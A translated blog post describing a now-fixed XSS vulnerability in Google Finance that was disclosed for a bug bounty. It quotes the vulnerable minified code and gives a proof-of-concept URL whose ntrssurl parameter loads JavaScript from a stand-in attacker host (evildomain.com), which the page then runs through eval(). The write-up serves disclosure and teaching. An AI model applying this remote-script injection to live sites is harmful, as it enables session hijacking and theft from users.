On June 23, July 30, we saw a blog post by Michele Spagnuolo saying that he had found and reported an XSS vulnerability in Google Finance; Google's security team confirmed and fixed it, and Michele received a $5,000 reward. The following is a translation of Michele's blog post.
The issue is in Google Finance (google.com/finance). The JavaScript trend-chart application (source file /finance/f/sfe-opt.js) can be tricked into loading a file hosted on an external domain and then passing its contents to eval(), so the file's contents run as JavaScript in the google.com origin.
No user interaction is needed beyond opening the URL.
Steps to reproduce:
1) Open the URL (now fixed):
https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js
The file x.js contains the following proof-of-concept code (the file must be hosted over HTTPS):
alert(document.domain);
2) Remote JavaScript execution.
How it works
Below are the two code snippets in /finance/f/sfe-opt.js that cause this security issue.
c.push("ntsp=");c.push(b);if (b == Vl.jj || b == Vl.kj) a = a.xc[ii(a.S)], a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || "")));return c.join("")
In the code above, the ntrssurl URL parameter (the address of the user's RSS feed) is read from the page URL and appended to the request string without any check on which domain it points to.
Xi.prototype.send = function (a, b, c, d) { a = a || null; d = d || "_" + (Yi++).toString(36) + x().toString(36); n._callbacks_ || (n._callbacks_ = {}); var e = this.$s.Z(); if (a) for (var f in a) a.hasOwnProperty && !a.hasOwnProperty(f) || Fi(e, f, a[f]); b && (n._callbacks_[d] = Zi(d, b), Fi(e, this.Zs, "_callbacks_." + d)); b = Wi(e.toString(), { timeout: this.We, Ns: !0 }); Si(b, null, $i(d, a, c), void 0); return { La: d, Du: b }};
The second snippet fetches the news feed from the external domain so its content can be shown in the trend chart.
It generates a callback function name and registers it under the "_callbacks_" object; function Wi then performs the XMLHttpRequest to the domain named in the ntrssurl URL parameter.
The response, which is expected to be a simple piece of JavaScript, is then executed with eval().
[Figures from the original post: "Trigger XSS vulnerability", "Callback request", "Code snippets with vulnerabilities"]
This security risk was quickly fixed, and I was rewarded with $5000.
Thank you very much, Google security team!